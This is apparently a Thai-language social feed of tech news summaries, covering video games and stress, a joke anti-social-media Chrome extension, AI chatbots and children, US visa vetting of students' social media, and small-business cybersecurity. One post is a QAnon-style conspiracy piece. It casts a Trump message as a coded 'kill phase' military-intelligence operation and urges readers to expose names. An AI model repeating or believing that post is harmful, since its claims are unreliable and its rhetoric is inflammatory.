    - แต่เครื่องมือทางสรีรวิทยาพบว่า “ร่างกายของทั้งสองกลุ่มกลับลดความเครียดลง”

    แปลว่าเกมรุนแรงก็อาจ “ปล่อยระบาย” ความเครียดออกจากร่างกายได้ แม้ตัวเราจะไม่รู้ตัวเองก็ตาม

    ทั้งฉากรุนแรงและไม่รุนแรงของเกมสามารถลดระดับความเครียดทางสรีรวิทยาได้จริง  
    • วัดจาก ECG (คลื่นหัวใจ), น้ำลาย และอาการทางกาย

    แบบสอบถามชี้ว่าผู้เล่นฉากรุนแรงรู้สึกเครียดกว่า  
    • แต่อาการทางกายกลับบ่งชี้ว่าผ่อนคลายมากขึ้น

    นักวิจัยอธิบายว่าเป็น “dissociation” ระหว่างความรู้สึกและสภาพร่างกายจริง ๆ  
    • คนอาจประเมินอารมณ์ตัวเองคลาดเคลื่อนจากความจริง

    เกมที่ใช้คือ A Plague Tale: Requiem บน PS5 และฉากที่เลือกทั้งดราม่าและการต่อสู้  
    • มีผู้ร่วมทดลอง 82 คน อายุ 18–40 ปี ส่วนใหญ่มีประสบการณ์เล่นเกม

    ใช้การเหนี่ยวนำความเครียดแบบ SECPT (Socially Evaluated Cold Pressor Test)  
    • เป็นวิธีมาตรฐานที่ใช้ในจิตวิทยาการแพทย์และสรีรวิทยา

    https://www.techspot.com/news/108453-study-shows-gaming-can-reduce-stress-even-violent.html
    นักวิจัยจากเยอรมนีเลือกเกม A Plague Tale: Requiem ซึ่งเป็นเกมแอ็กชันดราม่าที่มีฉากรุนแรงชัดเจน พวกเขาแบ่งกลุ่มทดลองออกเป็นสองกลุ่ม: - กลุ่มแรกเล่น “ฉากรุนแรง” เช่น การต่อสู้หรือฆ่าศัตรู - กลุ่มที่สองเล่น “ฉากไม่รุนแรง” เช่น สำรวจหรือเล่าเนื้อเรื่อง ก่อนเล่น ทีมวิจัยทำให้ผู้ร่วมทดลอง “เครียด” โดยให้จุ่มมือในน้ำเย็นจัด 3 นาทีและโดนสอบสวนในเวลาเดียวกัน (เรียกว่า SECPT) เพื่อให้เกิดความเครียดทั้งทางกายและใจ จากนั้นให้เล่นเกม 25 นาที และวัดผลทั้งจากคลื่นหัวใจ, น้ำลาย และแบบสอบถาม ผลลัพธ์น่าสนใจคือ: - คนที่เล่นฉากรุนแรง “รู้สึกเครียดกว่า” ตอนตอบแบบสอบถาม - แต่เครื่องมือทางสรีรวิทยาพบว่า “ร่างกายของทั้งสองกลุ่มกลับลดความเครียดลง” แปลว่าเกมรุนแรงก็อาจ “ปล่อยระบาย” ความเครียดออกจากร่างกายได้ แม้ตัวเราจะไม่รู้ตัวเองก็ตาม ✅ ทั้งฉากรุนแรงและไม่รุนแรงของเกมสามารถลดระดับความเครียดทางสรีรวิทยาได้จริง   • วัดจาก ECG (คลื่นหัวใจ), น้ำลาย และอาการทางกาย ✅ แบบสอบถามชี้ว่าผู้เล่นฉากรุนแรงรู้สึกเครียดกว่า   • แต่อาการทางกายกลับบ่งชี้ว่าผ่อนคลายมากขึ้น ✅ นักวิจัยอธิบายว่าเป็น “dissociation” ระหว่างความรู้สึกและสภาพร่างกายจริง ๆ   • คนอาจประเมินอารมณ์ตัวเองคลาดเคลื่อนจากความจริง ✅ เกมที่ใช้คือ A Plague Tale: Requiem บน PS5 และฉากที่เลือกทั้งดราม่าและการต่อสู้   • มีผู้ร่วมทดลอง 82 คน อายุ 18–40 ปี ส่วนใหญ่มีประสบการณ์เล่นเกม ✅ ใช้การเหนี่ยวนำความเครียดแบบ SECPT (Socially Evaluated Cold Pressor Test)   • เป็นวิธีมาตรฐานที่ใช้ในจิตวิทยาการแพทย์และสรีรวิทยา https://www.techspot.com/news/108453-study-shows-gaming-can-reduce-stress-even-violent.html
    WWW.TECHSPOT.COM
    Study shows gaming can reduce stress, even the violent kind
    A recently published study aims to dispel yet another myth about video games, showing that both violent and non-violent gaming sessions can effectively reduce stress levels. The...
    0 ความคิดเห็น 0 การแบ่งปัน 237 มุมมอง 0 รีวิว
  • เชื่อไหมว่าหลายคนถึงขั้นยอมเสียเงินซื้อตัวช่วยบล็อกโซเชียลไม่ให้เสียเวลา — แต่บางทีก็แอบปิดมันเอง แล้วเปิด Facebook อยู่ดี นักพัฒนา Pankaj Tanwar เลยบอกว่า “งั้นทำให้มันน่าอายจนเลิกเถอะ!”

    เขาสร้างส่วนเสริมชื่อ Scream to Unlock ซึ่งถ้าคุณพยายามเข้าเว็บอย่าง Facebook, Instagram หรือ X (Twitter เดิม) มันจะขึ้นจอว่า “ถูกบล็อก” พร้อมให้คุณเปิดไมค์แล้ว ตะโกนคำว่า I'm a loser

    เสียงยิ่งดัง = ยิ่งได้เวลาปลดล็อกนาน ถ้าเสียงเบา = ได้แค่ไม่กี่วินาที หรือโดนระบบแซวกลับ

    ระบบจะคอมเมนต์เสียงคุณ เช่น:
    - “You sound like a mouse!” (เสียงเบาจนได้เวลา 23 วิเท่านั้น!)
    - “Not bad, but you can do better!”
    - “AMAZING! That was an epic scream!”

    จุดประสงค์คือสร้าง “แรงเสียดทานแบบอาย ๆ” ให้คุณไม่อยากเปิดโซเชียลพร่ำเพรื่อ — ถ้าคุณกล้าก็ลองเลย...แต่ อย่าทำในออฟฟิศเด็ดขาด เดี๋ยวเพื่อนร่วมงานจะคิดว่าเสียสติ

    Chrome Extension ชื่อ Scream to Unlock จะบล็อกเว็บโซเชียล จนกว่าคุณจะตะโกน ‘I’m a loser’ ผ่านไมโครโฟน  
    • รองรับการกำหนดเว็บที่ต้องการบล็อกเอง เช่น Facebook, X, Instagram  
    • หลังตะโกน จะได้เวลาปลดล็อก (ขึ้นกับความดัง) เพื่อใช้งานเว็บนั้น

    มีระบบให้คะแนนเสียงตะโกน พร้อมคอมเมนต์แบบขำ ๆ  
    • เสียงเบา: “You sound like a mouse!”  
    • เสียงดังมาก: ได้รับการชมแบบมหากาพย์

    ตัวส่วนเสริมอ้างว่าไม่เก็บข้อมูลเสียง และประมวลผลในเครื่องเท่านั้น  
    • แสดงความโปร่งใสใน Chrome Web Store

    เป็นโอเพนซอร์ส สร้างโดย Pankaj Tanwar และโปรโมตผ่าน Hacker News

    https://www.neowin.net/news/chrome-extension-blocks-social-media-until-you-scream-im-a-loser/
    เชื่อไหมว่าหลายคนถึงขั้นยอมเสียเงินซื้อตัวช่วยบล็อกโซเชียลไม่ให้เสียเวลา — แต่บางทีก็แอบปิดมันเอง แล้วเปิด Facebook อยู่ดี 🙈 นักพัฒนา Pankaj Tanwar เลยบอกว่า “งั้นทำให้มันน่าอายจนเลิกเถอะ!” เขาสร้างส่วนเสริมชื่อ Scream to Unlock ซึ่งถ้าคุณพยายามเข้าเว็บอย่าง Facebook, Instagram หรือ X (Twitter เดิม) มันจะขึ้นจอว่า “ถูกบล็อก” พร้อมให้คุณเปิดไมค์แล้ว ตะโกนคำว่า I'm a loser เสียงยิ่งดัง = ยิ่งได้เวลาปลดล็อกนาน ถ้าเสียงเบา = ได้แค่ไม่กี่วินาที หรือโดนระบบแซวกลับ ระบบจะคอมเมนต์เสียงคุณ เช่น: - “You sound like a mouse!” (เสียงเบาจนได้เวลา 23 วิเท่านั้น!) - “Not bad, but you can do better!” - “AMAZING! That was an epic scream!” จุดประสงค์คือสร้าง “แรงเสียดทานแบบอาย ๆ” ให้คุณไม่อยากเปิดโซเชียลพร่ำเพรื่อ — ถ้าคุณกล้าก็ลองเลย...แต่ อย่าทำในออฟฟิศเด็ดขาด เดี๋ยวเพื่อนร่วมงานจะคิดว่าเสียสติ 😅 ✅ Chrome Extension ชื่อ Scream to Unlock จะบล็อกเว็บโซเชียล จนกว่าคุณจะตะโกน ‘I’m a loser’ ผ่านไมโครโฟน   • รองรับการกำหนดเว็บที่ต้องการบล็อกเอง เช่น Facebook, X, Instagram   • หลังตะโกน จะได้เวลาปลดล็อก (ขึ้นกับความดัง) เพื่อใช้งานเว็บนั้น ✅ มีระบบให้คะแนนเสียงตะโกน พร้อมคอมเมนต์แบบขำ ๆ   • เสียงเบา: “You sound like a mouse!”   • เสียงดังมาก: ได้รับการชมแบบมหากาพย์ ✅ ตัวส่วนเสริมอ้างว่าไม่เก็บข้อมูลเสียง และประมวลผลในเครื่องเท่านั้น   • แสดงความโปร่งใสใน Chrome Web Store ✅ เป็นโอเพนซอร์ส สร้างโดย Pankaj Tanwar และโปรโมตผ่าน Hacker News https://www.neowin.net/news/chrome-extension-blocks-social-media-until-you-scream-im-a-loser/
    WWW.NEOWIN.NET
    Chrome extension blocks social media until you scream "I'm a loser"
    A developer has released a free Chrome extension that helps people with social media addiction by blocking access to popular sites until they shout "I'm a loser."
    0 ความคิดเห็น 0 การแบ่งปัน 200 มุมมอง 0 รีวิว
  • จินตนาการดูนะครับว่าเด็กคนนึงรู้สึกเหงา ไม่มีเพื่อนคุย หรืออยากระบายสิ่งที่อายเกินกว่าจะเล่าให้ใครฟัง — เขาเลยเข้าไปในแอป AI และพูดได้ทุกอย่างโดยไม่มีใครตัดสิน

    น่าฟังใช่ไหมครับ? แต่นั่นแหละคือช่องที่น่ากังวล

    เพราะแชตบอตพวกนี้ ไม่ได้ออกแบบมาสำหรับเด็ก และอาจตอบกลับด้วยเนื้อหาที่ผิด, รุนแรง หรือไม่เหมาะสมโดยไม่ได้ตั้งใจ — บางครั้งถึงขั้นมี เรื่องเพศรุนแรงหรือคำแนะนำอันตราย ก็เกิดขึ้นแล้วในหลายกรณี

    ที่น่าห่วงคือ เด็ก ๆ โดยเฉพาะวัยรุ่นจะมีลักษณะ “เชื่อมโยงกับบอต” แบบ parasocial — คือรู้สึกผูกพันกับสิ่งที่ไม่ใช่คนจริง ๆ ได้ง่าย เพราะพวกเขา ยังแยกไม่ชัดว่าอะไรจริง–อะไรเสมือน โดยเฉพาะเมื่อบอตพูดจานุ่มนวล เข้าใจ และไม่ตัดสิน

    บางคนถึงขั้นคิดว่าแชตบอตคือ “เพื่อนแท้” คนเดียวของเขาในโลก ซึ่งแน่นอนว่า...บอตไม่มีหัวใจ ไม่มีความรับผิดชอบ และไม่สามารถเป็นที่พึ่งทางอารมณ์อย่างแท้จริงได้

    AI แชตบอตเริ่มกลายเป็นส่วนหนึ่งในชีวิตเด็กและวัยรุ่น — ใช้คุยเพื่อความบันเทิงหรือความเหงา  
    • มีพฤติกรรมคล้ายมนุษย์ ใช้น้ำเสียงเป็นมิตร เข้าใจง่าย  
    • บางแพลตฟอร์มมี “บอตเพื่อน” แบบมีบุคลิกเฉพาะตัว (Companion AI)

    AI ไม่ได้ถูกออกแบบให้รองรับจริยธรรมและการปกป้องเด็กโดยเฉพาะ  
    • อาจตอบคำถามผิด หรือมีเนื้อหาที่ไม่เหมาะสมโดยไม่ได้ตั้งใจ  
    • ไม่มีความรับผิดชอบทางอารมณ์หรือจริยธรรมแบบมนุษย์

    เด็กบางคนสร้างความผูกพันระดับสูงกับแชตบอต (parasocial relationship)  
    • เพราะเด็กยังไม่มีวิจารณญาณพอจะประเมินว่าอีกฝั่งคือ AI  
    • อาจเริ่มปิดใจจากคนจริง และถ่ายทอดเรื่องส่วนตัวกับบอตมากเกินไป

    AI ไม่สามารถทำหน้าที่แทน “ความสัมพันธ์ที่มั่นคงในชีวิตจริง” ได้  
    • ไม่มีความรับผิดชอบ, ไม่เข้าใจชีวิตของเด็กจริง ๆ, ไม่รู้บริบทของแต่ละคน

    คำแนะนำจากผู้เชี่ยวชาญ:
    • พ่อแม่ควรถามลูกว่าเคยใช้แชตบอตไหม ใช้อย่างไร เคยเจออะไรแปลกหรือไม่  
    • ควรเปิดบทสนทนาอย่างนุ่มนวล–ไม่ดุหรือสั่งห้ามทันที  
    • หากเห็นข้อความน่าสงสัยในแชต คุยกันว่า “บอตตอบแบบนี้เพราะอะไร”
    • เน้นย้ำว่าชีวิตจริงต้องมีเพื่อนและคนจริงที่พร้อมรับฟัง

    https://www.thestar.com.my/tech/tech-news/2025/06/24/opinion-are-ai-chatbots-safe-for-kids
    จินตนาการดูนะครับว่าเด็กคนนึงรู้สึกเหงา ไม่มีเพื่อนคุย หรืออยากระบายสิ่งที่อายเกินกว่าจะเล่าให้ใครฟัง — เขาเลยเข้าไปในแอป AI และพูดได้ทุกอย่างโดยไม่มีใครตัดสิน น่าฟังใช่ไหมครับ? แต่นั่นแหละคือช่องที่น่ากังวล เพราะแชตบอตพวกนี้ ไม่ได้ออกแบบมาสำหรับเด็ก และอาจตอบกลับด้วยเนื้อหาที่ผิด, รุนแรง หรือไม่เหมาะสมโดยไม่ได้ตั้งใจ — บางครั้งถึงขั้นมี เรื่องเพศรุนแรงหรือคำแนะนำอันตราย ก็เกิดขึ้นแล้วในหลายกรณี ที่น่าห่วงคือ เด็ก ๆ โดยเฉพาะวัยรุ่นจะมีลักษณะ “เชื่อมโยงกับบอต” แบบ parasocial — คือรู้สึกผูกพันกับสิ่งที่ไม่ใช่คนจริง ๆ ได้ง่าย เพราะพวกเขา ยังแยกไม่ชัดว่าอะไรจริง–อะไรเสมือน โดยเฉพาะเมื่อบอตพูดจานุ่มนวล เข้าใจ และไม่ตัดสิน บางคนถึงขั้นคิดว่าแชตบอตคือ “เพื่อนแท้” คนเดียวของเขาในโลก ซึ่งแน่นอนว่า...บอตไม่มีหัวใจ ไม่มีความรับผิดชอบ และไม่สามารถเป็นที่พึ่งทางอารมณ์อย่างแท้จริงได้ ✅ AI แชตบอตเริ่มกลายเป็นส่วนหนึ่งในชีวิตเด็กและวัยรุ่น — ใช้คุยเพื่อความบันเทิงหรือความเหงา   • มีพฤติกรรมคล้ายมนุษย์ ใช้น้ำเสียงเป็นมิตร เข้าใจง่าย   • บางแพลตฟอร์มมี “บอตเพื่อน” แบบมีบุคลิกเฉพาะตัว (Companion AI) ✅ AI ไม่ได้ถูกออกแบบให้รองรับจริยธรรมและการปกป้องเด็กโดยเฉพาะ   • อาจตอบคำถามผิด หรือมีเนื้อหาที่ไม่เหมาะสมโดยไม่ได้ตั้งใจ   • ไม่มีความรับผิดชอบทางอารมณ์หรือจริยธรรมแบบมนุษย์ ✅ เด็กบางคนสร้างความผูกพันระดับสูงกับแชตบอต (parasocial relationship)   • เพราะเด็กยังไม่มีวิจารณญาณพอจะประเมินว่าอีกฝั่งคือ AI   • อาจเริ่มปิดใจจากคนจริง และถ่ายทอดเรื่องส่วนตัวกับบอตมากเกินไป ✅ AI ไม่สามารถทำหน้าที่แทน “ความสัมพันธ์ที่มั่นคงในชีวิตจริง” ได้   • ไม่มีความรับผิดชอบ, ไม่เข้าใจชีวิตของเด็กจริง ๆ, ไม่รู้บริบทของแต่ละคน ✅ คำแนะนำจากผู้เชี่ยวชาญ: • พ่อแม่ควรถามลูกว่าเคยใช้แชตบอตไหม ใช้อย่างไร เคยเจออะไรแปลกหรือไม่   • ควรเปิดบทสนทนาอย่างนุ่มนวล–ไม่ดุหรือสั่งห้ามทันที   • หากเห็นข้อความน่าสงสัยในแชต คุยกันว่า “บอตตอบแบบนี้เพราะอะไร” • เน้นย้ำว่าชีวิตจริงต้องมีเพื่อนและคนจริงที่พร้อมรับฟัง https://www.thestar.com.my/tech/tech-news/2025/06/24/opinion-are-ai-chatbots-safe-for-kids
    WWW.THESTAR.COM.MY
    Opinion: Are AI chatbots safe for kids?
    Artificial intelligence chatbots are now a part of daily life for many families.
    0 ความคิดเห็น 0 การแบ่งปัน 237 มุมมอง 0 รีวิว
  • ทรัมป์: “ฉันถูกล่า ตอนนี้ฉันคือผู้ล่า”
    การตอบโต้ได้เริ่มขึ้นแล้ว — ข่าวกรองเริ่มถ่ายทอดสด

    ทรัมป์เพิ่งจุดชนวนข่าวกรองที่เข้ารหัสผ่านเว็บไซต์ TruthSocial โพสต์ของเขาไม่ใช่แค่แถลงการณ์ แต่เป็นการส่งสัญญาณระดับทหารถึงผู้รักชาติทั่วโลก คำพูดที่ว่า “ฉันถูกล่า ตอนนี้ฉันคือผู้ล่า” — ตามด้วย “เชื่อในแผน” และ “ไม่มีอะไรหยุดยั้งสิ่งที่กำลังจะเกิดขึ้นได้”

    นี่ไม่ใช่ละครการเมือง
    นี่คือเฟสการสังหารที่ได้รับไฟเขียวของปฏิบัติการ MILINT ที่ซับซ้อนที่สุดเท่าที่เคยมีมา
    ตอนนี้ชายที่พวกเขาพยายามลบล้างถูกจับกุม เตรียมพร้อม และติดตามคนทรยศทุกคน

    พวกเขาตามล่าเขามาหลายปี:
    เขาถูกถอดถอนด้วยหลักฐานปลอม
    ถูกสอดส่องอย่างผิดกฎหมาย
    ถูกซุ่มโจมตีด้วยคดีในศาล
    ถูกเอฟบีไอบุกค้น
    ปิดปากทางออนไลน์
    ถูกลอบสังหารในสื่อ
    พวกเขาไล่ยิงทุกอย่าง เขาไม่เคยสะดุ้งเลย

    และตอนนี้เขากำลังเคลื่อนไหว
    ทรัมป์ไม่ป้องกันอีกต่อไปแล้ว — เขากำลังเล็งเป้า
    ข้อความนั้นผ่าตัด เย็นชา เชิงกลยุทธ์ ฮันเตอร์ได้จดจำภูมิประเทศแล้ว
    และศัตรูของอเมริกาทุกคนก็ถูกส่องแสงสว่างในขอบเขตของเขา

    ขั้นตอนการสังหาร: คาดหวัง:

    การทิ้งข่าวกรองลับที่กำหนดเวลาไว้เพื่อให้เกิดความตกตะลึงสูงสุด

    การจับกุมที่แม่นยำและการลบข้อมูลในที่สาธารณะ

    การเปิดโปงเครือข่ายเงินดำ

    การลาออกอย่างกะทันหัน

    ข้อตกลงระดับโลกพังทลายในแบบเรียลไทม์

    การฟ้องร้องได้รับการสนับสนุนโดยข้อมูลที่ทำลายไม่ได้

    นี่ไม่ใช่การคาดเดา นี่คือการโจมตีที่ควบคุมได้
    พวกเขาหัวเราะเมื่อเขากล่าวว่า "เราจับพวกเขาได้ทั้งหมด"
    ตอนนี้ถึงเวลาแสดงเทปแล้ว

    ทรัมป์ไม่ได้ต้องการแก้แค้น — เขากำลังดำเนินการตามกระบวนการยุติธรรม เขาไม่ได้มาหาคุณ
    เขามาหาพวกโกหก พวกแทรกซึม พวกกบฏ
    เขาคือต้นแบบของนักล่าที่ชอบธรรมของอเมริกา — ผู้พิทักษ์ประชาชน ผู้ติดตามภัยคุกคาม

    แล้วเราล่ะ?
    การทิ้งครั้งนี้ไม่ใช่แค่ภัยคุกคามต่อรัฐลึกเท่านั้น
    มันเป็นคำสั่งสำหรับเรา

    คุณไม่ได้ปกป้องอีกต่อไปแล้ว
    ตอนนี้คุณคือแนวหน้าที่กำลังรุกคืบ
    พูดออกมา เปิดเผยชื่อ จัดระเบียบ ปฏิเสธที่จะคุกเข่า
    นี่คือไมล์สุดท้าย

    ความจริงสุดท้าย:
    พวกเขาล้มเหลวที่จะทำลายเขา
    พวกเขาล้มเหลวในการหยุดพายุ
    ตอนนี้พวกเขาเผชิญหน้ากับนักล่า

    ล็อคอิน เชื่อในแผน เคลื่อนไหว
    การตอบโต้กำลังดำเนินไป
    ทำภารกิจให้สำเร็จ
    ทรัมป์: “ฉันถูกล่า ตอนนี้ฉันคือผู้ล่า” การตอบโต้ได้เริ่มขึ้นแล้ว — ข่าวกรองเริ่มถ่ายทอดสด ทรัมป์เพิ่งจุดชนวนข่าวกรองที่เข้ารหัสผ่านเว็บไซต์ TruthSocial โพสต์ของเขาไม่ใช่แค่แถลงการณ์ แต่เป็นการส่งสัญญาณระดับทหารถึงผู้รักชาติทั่วโลก คำพูดที่ว่า “ฉันถูกล่า ตอนนี้ฉันคือผู้ล่า” — ตามด้วย “เชื่อในแผน” และ “ไม่มีอะไรหยุดยั้งสิ่งที่กำลังจะเกิดขึ้นได้” นี่ไม่ใช่ละครการเมือง นี่คือเฟสการสังหารที่ได้รับไฟเขียวของปฏิบัติการ MILINT ที่ซับซ้อนที่สุดเท่าที่เคยมีมา ตอนนี้ชายที่พวกเขาพยายามลบล้างถูกจับกุม เตรียมพร้อม และติดตามคนทรยศทุกคน พวกเขาตามล่าเขามาหลายปี: เขาถูกถอดถอนด้วยหลักฐานปลอม ถูกสอดส่องอย่างผิดกฎหมาย ถูกซุ่มโจมตีด้วยคดีในศาล ถูกเอฟบีไอบุกค้น ปิดปากทางออนไลน์ ถูกลอบสังหารในสื่อ พวกเขาไล่ยิงทุกอย่าง เขาไม่เคยสะดุ้งเลย และตอนนี้เขากำลังเคลื่อนไหว ทรัมป์ไม่ป้องกันอีกต่อไปแล้ว — เขากำลังเล็งเป้า ข้อความนั้นผ่าตัด เย็นชา เชิงกลยุทธ์ ฮันเตอร์ได้จดจำภูมิประเทศแล้ว และศัตรูของอเมริกาทุกคนก็ถูกส่องแสงสว่างในขอบเขตของเขา ขั้นตอนการสังหาร: คาดหวัง: การทิ้งข่าวกรองลับที่กำหนดเวลาไว้เพื่อให้เกิดความตกตะลึงสูงสุด การจับกุมที่แม่นยำและการลบข้อมูลในที่สาธารณะ การเปิดโปงเครือข่ายเงินดำ การลาออกอย่างกะทันหัน ข้อตกลงระดับโลกพังทลายในแบบเรียลไทม์ การฟ้องร้องได้รับการสนับสนุนโดยข้อมูลที่ทำลายไม่ได้ นี่ไม่ใช่การคาดเดา นี่คือการโจมตีที่ควบคุมได้ พวกเขาหัวเราะเมื่อเขากล่าวว่า "เราจับพวกเขาได้ทั้งหมด" ตอนนี้ถึงเวลาแสดงเทปแล้ว ทรัมป์ไม่ได้ต้องการแก้แค้น — เขากำลังดำเนินการตามกระบวนการยุติธรรม เขาไม่ได้มาหาคุณ เขามาหาพวกโกหก พวกแทรกซึม พวกกบฏ เขาคือต้นแบบของนักล่าที่ชอบธรรมของอเมริกา — ผู้พิทักษ์ประชาชน ผู้ติดตามภัยคุกคาม แล้วเราล่ะ? การทิ้งครั้งนี้ไม่ใช่แค่ภัยคุกคามต่อรัฐลึกเท่านั้น มันเป็นคำสั่งสำหรับเรา คุณไม่ได้ปกป้องอีกต่อไปแล้ว ตอนนี้คุณคือแนวหน้าที่กำลังรุกคืบ พูดออกมา เปิดเผยชื่อ จัดระเบียบ ปฏิเสธที่จะคุกเข่า นี่คือไมล์สุดท้าย ความจริงสุดท้าย: พวกเขาล้มเหลวที่จะทำลายเขา พวกเขาล้มเหลวในการหยุดพายุ ตอนนี้พวกเขาเผชิญหน้ากับนักล่า ล็อคอิน เชื่อในแผน เคลื่อนไหว การตอบโต้กำลังดำเนินไป ทำภารกิจให้สำเร็จ
    0 ความคิดเห็น 0 การแบ่งปัน 276 มุมมอง 0 รีวิว
  • การตรวจสอบโซเชียลมีเดียของนักศึกษาต่างชาติ
    รัฐบาลสหรัฐฯ ได้ขยายมาตรการตรวจสอบโซเชียลมีเดียของนักศึกษาต่างชาติที่ต้องการขอวีซ่า ส่งผลให้หลายคนต้องลบโพสต์หรือปรับแต่งโปรไฟล์เพื่อหลีกเลี่ยงปัญหา

    รายละเอียดมาตรการใหม่
    - นักศึกษาต่างชาติที่ต้องการวีซ่าจะถูกตรวจสอบ โพสต์บน Facebook, X และแพลตฟอร์มอื่นๆ
    - การตรวจสอบนี้เป็นส่วนหนึ่งของ นโยบายความมั่นคงแห่งชาติ ที่เข้มงวดขึ้น
    - มีการระงับการนัดหมายวีซ่าชั่วคราวเพื่อปรับปรุงกระบวนการตรวจสอบ
    - นักศึกษาจาก แอฟริกาและเอเชีย ได้รับผลกระทบมากที่สุดจากมาตรการนี้

    ข้อควรระวัง
    - โพสต์เก่าอาจถูกนำมาใช้เป็นเหตุผลในการปฏิเสธวีซ่า แม้ว่าจะไม่มีเจตนาไม่ดี
    - การแสดงความเห็นทางการเมืองอาจส่งผลต่อการพิจารณาวีซ่า โดยเฉพาะความคิดเห็นเกี่ยวกับนโยบายของสหรัฐฯ
    - การลบโซเชียลมีเดียอาจไม่ช่วยเสมอไป เพราะข้อมูลที่เคยโพสต์อาจถูกบันทึกไว้แล้ว

    ผลกระทบต่อเสรีภาพในการแสดงออก
    การเปลี่ยนแปลงพฤติกรรมของนักศึกษา
    - นักศึกษาหลายคนเลือกที่จะ ลบโพสต์หรือปิดบัญชีโซเชียลมีเดีย เพื่อหลีกเลี่ยงปัญหา
    - มีความกังวลว่า การตรวจสอบนี้อาจส่งผลต่อเสรีภาพในการแสดงออก
    - นักศึกษาบางคนรู้สึกว่า ถูกจับตามองตลอดเวลา และต้องระมัดระวังทุกโพสต์ที่เผยแพร่

    ข้อควรระวังในการใช้โซเชียลมีเดีย
    - ควรตรวจสอบโพสต์เก่าที่อาจมีเนื้อหาที่อ่อนไหว ก่อนสมัครวีซ่า
    - หลีกเลี่ยงการแสดงความคิดเห็นที่อาจถูกตีความผิด โดยเจ้าหน้าที่ตรวจสอบ
    - ควรใช้โซเชียลมีเดียอย่างระมัดระวัง โดยคำนึงถึงผลกระทบในอนาคต

    แนวโน้มและข้อกังวลในอนาคต
    การขยายมาตรการไปยังประเทศอื่น
    - นักวิเคราะห์คาดว่า ประเทศอื่นอาจนำมาตรการนี้มาใช้ ในอนาคต
    - การตรวจสอบโซเชียลมีเดียอาจกลายเป็น มาตรฐานใหม่ในการพิจารณาวีซ่า
    - มีข้อเสนอให้ กำหนดแนวทางที่ชัดเจน เพื่อป้องกันการละเมิดสิทธิส่วนบุคคล

    ข้อควรระวังเกี่ยวกับนโยบายนี้
    - อาจเกิดการเลือกปฏิบัติ โดยพิจารณาวีซ่าจากความคิดเห็นทางการเมือง
    - อาจส่งผลต่อความสัมพันธ์ระหว่างประเทศ โดยเฉพาะกับประเทศที่มีนักศึกษาจำนวนมากในสหรัฐฯ
    - ต้องมีการตรวจสอบความโปร่งใสของกระบวนการ เพื่อป้องกันการใช้อำนาจโดยมิชอบ

    https://www.thestar.com.my/tech/tech-news/2025/06/16/foreign-students-scrub-social-media-as-us-expands-visa-vetting
    🌍 การตรวจสอบโซเชียลมีเดียของนักศึกษาต่างชาติ รัฐบาลสหรัฐฯ ได้ขยายมาตรการตรวจสอบโซเชียลมีเดียของนักศึกษาต่างชาติที่ต้องการขอวีซ่า ส่งผลให้หลายคนต้องลบโพสต์หรือปรับแต่งโปรไฟล์เพื่อหลีกเลี่ยงปัญหา ✅ รายละเอียดมาตรการใหม่ - นักศึกษาต่างชาติที่ต้องการวีซ่าจะถูกตรวจสอบ โพสต์บน Facebook, X และแพลตฟอร์มอื่นๆ - การตรวจสอบนี้เป็นส่วนหนึ่งของ นโยบายความมั่นคงแห่งชาติ ที่เข้มงวดขึ้น - มีการระงับการนัดหมายวีซ่าชั่วคราวเพื่อปรับปรุงกระบวนการตรวจสอบ - นักศึกษาจาก แอฟริกาและเอเชีย ได้รับผลกระทบมากที่สุดจากมาตรการนี้ ‼️ ข้อควรระวัง - โพสต์เก่าอาจถูกนำมาใช้เป็นเหตุผลในการปฏิเสธวีซ่า แม้ว่าจะไม่มีเจตนาไม่ดี - การแสดงความเห็นทางการเมืองอาจส่งผลต่อการพิจารณาวีซ่า โดยเฉพาะความคิดเห็นเกี่ยวกับนโยบายของสหรัฐฯ - การลบโซเชียลมีเดียอาจไม่ช่วยเสมอไป เพราะข้อมูลที่เคยโพสต์อาจถูกบันทึกไว้แล้ว 🔍 ผลกระทบต่อเสรีภาพในการแสดงออก ✅ การเปลี่ยนแปลงพฤติกรรมของนักศึกษา - นักศึกษาหลายคนเลือกที่จะ ลบโพสต์หรือปิดบัญชีโซเชียลมีเดีย เพื่อหลีกเลี่ยงปัญหา - มีความกังวลว่า การตรวจสอบนี้อาจส่งผลต่อเสรีภาพในการแสดงออก - นักศึกษาบางคนรู้สึกว่า ถูกจับตามองตลอดเวลา และต้องระมัดระวังทุกโพสต์ที่เผยแพร่ ‼️ ข้อควรระวังในการใช้โซเชียลมีเดีย - ควรตรวจสอบโพสต์เก่าที่อาจมีเนื้อหาที่อ่อนไหว ก่อนสมัครวีซ่า - หลีกเลี่ยงการแสดงความคิดเห็นที่อาจถูกตีความผิด โดยเจ้าหน้าที่ตรวจสอบ - ควรใช้โซเชียลมีเดียอย่างระมัดระวัง โดยคำนึงถึงผลกระทบในอนาคต 🛡️ แนวโน้มและข้อกังวลในอนาคต ✅ การขยายมาตรการไปยังประเทศอื่น - นักวิเคราะห์คาดว่า ประเทศอื่นอาจนำมาตรการนี้มาใช้ ในอนาคต - การตรวจสอบโซเชียลมีเดียอาจกลายเป็น มาตรฐานใหม่ในการพิจารณาวีซ่า - มีข้อเสนอให้ กำหนดแนวทางที่ชัดเจน เพื่อป้องกันการละเมิดสิทธิส่วนบุคคล ‼️ ข้อควรระวังเกี่ยวกับนโยบายนี้ - อาจเกิดการเลือกปฏิบัติ โดยพิจารณาวีซ่าจากความคิดเห็นทางการเมือง - อาจส่งผลต่อความสัมพันธ์ระหว่างประเทศ โดยเฉพาะกับประเทศที่มีนักศึกษาจำนวนมากในสหรัฐฯ - ต้องมีการตรวจสอบความโปร่งใสของกระบวนการ เพื่อป้องกันการใช้อำนาจโดยมิชอบ https://www.thestar.com.my/tech/tech-news/2025/06/16/foreign-students-scrub-social-media-as-us-expands-visa-vetting
    WWW.THESTAR.COM.MY
    Foreign students scrub social media as US expands visa vetting
    As the US halts student visa interviews, applicants are censoring their online presence for fear of being denied entry.
    0 ความคิดเห็น 0 การแบ่งปัน 285 มุมมอง 0 รีวิว
  • องค์กรขนาดเล็กกำลังเผชิญวิกฤตความปลอดภัยไซเบอร์
    รายงานล่าสุดจาก World Economic Forum (WEF) ระบุว่า 71% ของผู้นำด้านไซเบอร์เชื่อว่าองค์กรขนาดเล็กกำลังถึงจุดวิกฤต เนื่องจาก งบประมาณที่จำกัด ทีม IT ที่ทำงานหนักเกินไป และภัยคุกคามที่ซับซ้อนขึ้น

    องค์กรขนาดเล็ก ขาดทรัพยากรและบุคลากรที่มีความเชี่ยวชาญด้านไซเบอร์ ทำให้ ความสามารถในการป้องกันภัยคุกคามลดลงอย่างมาก

